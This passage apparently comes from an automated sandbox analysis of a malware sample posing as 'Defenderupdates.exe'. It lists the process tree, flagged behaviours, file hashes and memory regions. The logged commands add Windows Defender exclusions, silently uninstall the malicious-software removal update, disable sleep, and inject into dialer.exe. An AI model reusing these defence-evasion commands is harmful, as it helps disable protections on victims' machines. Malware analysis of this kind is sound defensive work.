                                                                                              PID:1056
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3772
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4056
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4132
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:4348
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:5032
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                        PID:4356
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4172
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1732
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:2604
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:3080
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3984
                                                                                                              • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                1⤵
                                                                                                                  PID:5108
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                  1⤵
                                                                                                                    PID:4372
                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
                                                                                                                    1⤵
                                                                                                                      PID:4460
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:760
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                          PID:4928
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:1912
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:3620
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:1596
                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4424
                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:1168
                                                                                                                                • C:\ProgramData\Defenderupdates.exe
                                                                                                                                  C:\ProgramData\Defenderupdates.exe
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2380
                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                    2⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:936
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:2820
                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                      3⤵
                                                                                                                                        PID:732
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                      2⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4804
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                      2⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4836
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                      2⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1540
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                      2⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3060
                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:3600
                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:4388
                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                          dialer.exe
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3696
                                                                                                                                      • C:\Windows\System32\smartscreen.exe
                                                                                                                                        C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:3580

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

                                                                                                                                          Filesize

                                                                                                                                          420B

                                                                                                                                          MD5

                                                                                                                                          d933be12f5723cd041381813106b9041

                                                                                                                                          SHA1

                                                                                                                                          c874649f35a6d8775aad47ea6d5e6b6ca35641a2

                                                                                                                                          SHA256

                                                                                                                                          2ceea2dffab4b6a0e13ae4ff68c36605e8f5b56f699a3337938bd998776868ce

                                                                                                                                          SHA512

                                                                                                                                          cb2135399e547caf31c09ca7ba56ef1f10882d2a09e7edfa30c75f3169243b2d1b48810d4328d6677999d6a2378dc3294b7a0745abcd0cc70b4bedc1ae5ef1f5

                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                          Filesize

                                                                                                                                          290B

                                                                                                                                          MD5

                                                                                                                                          7445e041934724e378dcd161f80ead88

                                                                                                                                          SHA1

                                                                                                                                          0e0e67c07b390b1469d3e0ba6bf677ab20566d30

                                                                                                                                          SHA256

                                                                                                                                          b6ac03f13585b949d5f8542ac777137a1ba51d510570351f5d9fa82b8d9d2d1e

                                                                                                                                          SHA512

                                                                                                                                          7cf6f43ba6a2c1764580d9e14228b78870662b700a7ead4f78af1de3d4433065be5382baecbb9aa23cdd06ed3d640ff054d893c160b43914ee0ba0e626811224

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe

                                                                                                                                          Filesize

                                                                                                                                          1.8MB

                                                                                                                                          MD5

                                                                                                                                          53821ade39d6c31820062190b753547d

                                                                                                                                          SHA1

                                                                                                                                          0b9987172abddac05c1e8c67aa979db5596c9a6f

                                                                                                                                          SHA256

                                                                                                                                          c296811e87815360a718e4e5291bc0f7844acc25c72ad7c71e1504a2ad47ca37

                                                                                                                                          SHA512

                                                                                                                                          ed542bca9aa6c14a3ccd0dd1a18a5dd2ff412859ab3bb43da890cffa326d95f1e00c61210fa09a4f82ce9da05f0e7dbbea6280d2d24da5f8607f1f148192dce4

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe

                                                                                                                                          Filesize

                                                                                                                                          5.3MB

                                                                                                                                          MD5

                                                                                                                                          7bda2ed86f648c8528531d76f0a53f2a

                                                                                                                                          SHA1

                                                                                                                                          5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

                                                                                                                                          SHA256

                                                                                                                                          667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

                                                                                                                                          SHA512

                                                                                                                                          075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5byt024a.5qi.ps1

                                                                                                                                          Filesize

                                                                                                                                          60B

                                                                                                                                          MD5

                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                          SHA1

                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                          SHA256

                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                          SHA512

                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                          Filesize

                                                                                                                                          3KB

                                                                                                                                          MD5

                                                                                                                                          6db666b8eea8c87bb44fc342dbda5fcb

                                                                                                                                          SHA1

                                                                                                                                          2536fb957e13fd2144e482970707286ca2625816

                                                                                                                                          SHA256

                                                                                                                                          079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438

                                                                                                                                          SHA512

                                                                                                                                          88fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e

                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          35d6dc85f8160a917fd1cfc3a0ba8874

                                                                                                                                          SHA1

                                                                                                                                          fdbb4749a5c098b123cd4f946debd0fb5e4c409e

                                                                                                                                          SHA256

                                                                                                                                          a165677049585793834a28f030a9414cb0eea85ec94a60a0be400809e43a0374

                                                                                                                                          SHA512

                                                                                                                                          95a51a8bec50eaeffb8b33727442a52d975b4f6262ebdcf08f8a94e9e1684594bc1cf021e1c1f919445d6e61e5778fe2f6dc7bf5d67d4883ab151cfbab2032c8

                                                                                                                                        • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          4d4f2dd754c8e7c3875c0cc550489b42

                                                                                                                                          SHA1

                                                                                                                                          5349236f1a29f427fe1ea00d420d7b2aace7f4c3

                                                                                                                                          SHA256

                                                                                                                                          28cbbe89a4588e4ecadd143a3d420863b2a027723410a6ca6d179d47de120e7f

                                                                                                                                          SHA512

                                                                                                                                          1dcc77f74f3541f30377a64eb22b255e9063d01e16d061df2082f20c9926660533bf08a59f88ca7e06bfcc88cf4a6e827d508921a57aa665be0af9c475b44fbb

                                                                                                                                        • memory/624-145-0x0000026E07590000-0x0000026E075BB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/624-153-0x00007FFA17290000-0x00007FFA172A0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/624-152-0x0000026E07590000-0x0000026E075BB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/624-144-0x0000026E07560000-0x0000026E07585000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          148KB

                                                                                                                                        • memory/624-146-0x0000026E07590000-0x0000026E075BB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/676-157-0x0000022960F60000-0x0000022960F8B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/936-83-0x000001AF7DC40000-0x000001AF7DC5C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          112KB

                                                                                                                                        • memory/936-85-0x000001AF7DC30000-0x000001AF7DC3A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/936-84-0x000001AF7DC60000-0x000001AF7DD15000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          724KB

                                                                                                                                        • memory/1120-124-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-141-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-122-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-121-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-123-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-126-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/1120-127-0x00007FFA57210000-0x00007FFA57408000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          2.0MB

                                                                                                                                        • memory/1120-128-0x00007FFA56AD0000-0x00007FFA56B8D000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          756KB

                                                                                                                                        • memory/1524-0-0x00007FFA39225000-0x00007FFA39226000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/1524-10-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          9.6MB

                                                                                                                                        • memory/1524-29-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          9.6MB

                                                                                                                                        • memory/1524-2-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          9.6MB

                                                                                                                                        • memory/2928-50-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/2928-47-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/2928-49-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/2928-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/2928-48-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/3168-118-0x00007FFA57210000-0x00007FFA57408000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          2.0MB

                                                                                                                                        • memory/3168-119-0x00007FFA56AD0000-0x00007FFA56B8D000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          756KB

                                                                                                                                        • memory/3168-117-0x000002D148970000-0x000002D14899A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          168KB

                                                                                                                                        • memory/3696-103-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-110-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-114-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-106-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-104-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-107-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-108-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-109-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-111-0x00000219E71F0000-0x00000219E7210000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          128KB

                                                                                                                                        • memory/3696-113-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-115-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-112-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/3696-116-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8.2MB

                                                                                                                                        • memory/4388-99-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4388-95-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4388-97-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4388-105-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4388-98-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4388-96-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          56KB

                                                                                                                                        • memory/4452-45-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/4452-42-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/4452-41-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/4452-40-0x0000023DEB040000-0x0000023DEB062000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/4452-30-0x00007FFA37C93000-0x00007FFA37C95000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB